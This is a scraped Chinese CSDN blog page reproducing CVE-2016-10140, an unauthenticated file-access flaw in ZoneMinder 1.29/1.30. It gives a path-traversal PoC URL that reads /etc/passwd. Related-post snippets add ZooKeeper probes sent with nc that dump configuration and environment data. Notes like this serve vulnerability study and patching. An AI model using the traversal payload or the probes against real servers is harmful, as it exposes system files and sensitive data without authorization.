Zoneminder 未授权访问​(cve_2016_10140)

最新推荐文章于 2024-10-07 01:36:35 发布
最新推荐文章于 2024-10-07 01:36:35 发布
阅读量541 收藏 9
点赞数 11
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135247494
版权

漏洞描述:

ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。

复现过程:

1.访问ip:port

2.构造poc

/?view=file&path=/../../../../../etc/passwd

修复建议:

升级版本。

慕筱蚺
关注
ZooKeeper 授权访问漏洞
玄道的网安博客
07-03 7218
简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务。 Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。 环境搭建 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4..
zookeeper授权访问漏洞处理
热门推荐
weixin_50016127的博客
06-27 1万+
zookeeper授权访问漏洞处理
Zoneminder
xuyss的专栏
05-06 3288
https://www.zoneminder.com/ 使用ZoneMinder之前需要先安装配置好LAMP 执行:sudo apt-get install zoneminder 默认安装后执行:sudo ln -s  /usr/share/zoneminder  /var/www/ 进行链接 重启apatch2 执行:sudo /etc/init.d/apatch2 restart
批量执行linux漏洞,ZoneMinder 多个远程任意命令执行漏洞
weixin_33518100的博客
05-13 213
发布日期:2013-01-31更新日期:2013-02-02受影响系统:ZoneMinder ZoneMinder 1.24.0 - 1.25.0描述:--------------------------------------------------------------------------------ZoneMinder是单个或多个摄像机视频安全应用。ZoneMinder 1.24.0至...
ZoneMinder v1.26.5
05-10
ZoneMinder是一款开源视频监控系统。 ZoneMinder的作者是因为家中的车库被窃,因而产生设计监控保全的念头。 ZoneMinder使用了Linux Server,PHP,MySQL加上几支摄影机,就可以使用web介面监控重要场所。当异常事件发生时,你就可以收到e-mail或简讯通知。   
ZoneMinder使用问题集
m0_68554329的博客
12-31 438
无关紧要
CentOS 7 安装zoneminder
u013693304的博客
02-22 2824
这里写自定义目录标题CentOS 7 安装zoneminder1、安装centos系统,最小化安装2、配置源3、安装 zoneminder 以及环境4、关闭SELinux5、配置时区6、添加php网页支持7、安装配置数据库8、启用https9、启动apache10、启动zoneminder11、配置防火墙12、登录zoneminder CentOS 7 安装zoneminder 折腾半天,搞定了,做下记录 1、安装centos系统,最小化安装 这一步就不写了,傻瓜式操作 2、配置源 yum install
ZooKeeper授权访问-解决方案
weixin_43840872的博客
08-18 1343
ZooKeeper授权访问-解决方案
基于Python实现的Zoneminder 授权访问批量检测工具源代码
09-20
基于Python实现的Zoneminder 授权访问批量检测工具源代码 ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程认证攻击者浏览web根目录下的所有目录。 使用方法 1.将...
ZoneMinder_install(2).rar_软件设计/软件工程_Unix_Linux_
08-12
9. **安全与性能优化**:确保ZoneMinder系统的安全性,包括限制远程访问,使用SSL加密通信,以及定期备份数据库。同时,优化设置可以提升系统性能,例如合理分配CPU和内存资源。 10. **故障排查与日志分析**:在...
免费开源的视频监控系统(CCTV)ZoneMinder安装配置指南
03-03
ZoneMinder安装DVD下载+安装+配置说明
zoneminder_docker:Zoneminder容器
03-08
Zoneminder容器 从容器中的源代码直接编译和安装Zoneminder的早期版本。 这将是一个AIO容器,在单个容器中运行Zoneminder所需的所有服务,由s6 overlay管理。 去做: 修复Zoneminder中的符号链接(导致ui无法正确...
ZoneMinder配置与使用
05-19 1328
ZoneMinder是一套基于Linux操作系统的摄像机的视像数据监控的应用软件。应用范围广泛,包括商业或家居防盗等。ZoneMinder支持单一或多台视像镜头应用,包括摄取、分析、记录、和监视来源,要使ZoneMinder正常运行起来必须首先配置好Linux下的PHP,MySQL环境,而且还有在系统上至少有一个摄像头能稳定工作,接下来就可以通过ZM的web介面监控重要场所了。使用Z...
Apache Zookeeper 授权访问漏洞【原理扫描】
萌兔兔MMQ!!
11-25 1万+
漏洞名称 Apache Zookeeper 授权访问漏洞【原理扫描】风险等级 高高可利用 否CVE编号 -端口(服务) 2181(zookeeper)风险描述 ZooKeeper是一个高性能的分布式数据一致性解决方案,它将复杂的,容易出错的分布式一致性服务封装起来,构成一个高效可靠的原语集,并提供一系列简单易用的接口给客户使用。ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
zookeeper 授权访问_Zookeeper授权访问检测与修复
weixin_39569389的博客
12-12 3457
之前遇到zookeeper授权访问问题,网上查到的资料基本都是关于限制匿名访问的解决方法,没有找到解决信息泄露的问题,最后查阅官方文档才解决,故此分享一下。漏洞描述:该漏洞非软件配置导致的,必须打补丁或升级版本才可解决,利用漏洞可收集目标服务器环境等敏感信息,或者破坏zookeeper集群。受影响范围:ZooKeeper3.4.10 之前版本受影响ZooKeeper 3.5.0-al...
关于Zookeeper授权访问漏洞的解决办法
DreamsArchitects的博客
09-12 9728
一、介绍 搭建完zookeeper集群后,收到了关于zookeeper的漏洞信息: 我们在使用zookeeper提供的服务的时候会发现,只要知道zk服务端的IP和Port,任务用户或者客户端根本不需要任何的认证就可以连上zk的服务端,并且可以对znode进行增删等操作。这样数据是非常不安全的,极易被攻击和篡改。 zookeeper解决这个问题的手段是ACL(access control list)机制,即访问控制列表。 1.权限操作 权限permission:zookeeper目前支持下面一些权限: C
Zookeeper授权访问
per_se_veran_ce的博客
11-12 1356
Zookeeper授权访问 我们在使用zookeeper提供的服务的时候会发现,只要知道zk服务端的IP和Port,任务用户或者客户端根本不需要任何的认证就可以连上zk的服务端,并且可以对znode进行增删等操作。这样数据是非常不安全的,极易被攻击和篡改。 echo conf | nc 192.168.3.132 2181 查看配置文件 echo envi | nc 192.168.3.132 2181 查看环境变量 ./zkCli.sh -server 192.168.3.132:218
task【XTuner微调个人小助手认知】
最新发布
m0_53291740的博客
10-07 788
下面我们将根据项目的需求一步步的进行修改和调整吧!在 PART 1 的部分,由于我们不再需要在 HuggingFace 上自动下载模型,因此我们先要更换模型的路径以及数据集的路径为我们本地的路径。为了训练过程中能够实时观察到模型的变化情况,XTuner 贴心的推出了一个。
zoneminder添加海康威视
08-17
要将海康威视添加到zoneminder中,需要按照以下步骤进行操作: 1. 首先,在浏览器中打开zoneminder主页,并使用管理员账户登录系统。 2. 在主页顶部导航栏中,点击“添加新监控”按钮。 3. 在弹出的新监控窗口中,填写必要的信息,如名称、IP地址和端口等。 4. 在“源”选项卡下,选择“摄像机模型”为海康威视,并在下方的配置区域中填写相应的参数。根据海康威视的不同型号和设置,可能需要提供用户名、密码、通道号等信息。 5. 确保正确设置了视频相关的参数,如分辨率、图像质量等。 6. 在其他选项卡下,根据需求进行设置,如录像、存储、警报等。 7. 最后,点击“保存”按钮,以保存并应用设置。 完成这些步骤后,zoneminder将会尝试与海康威视摄像机建立连接,并获取视频流。如果设置正确,您应该能够在zoneminder的监控界面上看到来自海康威视摄像机的视频。如果连接失败或画面不清晰,可以检查参数设置是否正确,并尝试重新设置。 希望以上步骤能够帮助您成功添加海康威视到zoneminder中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值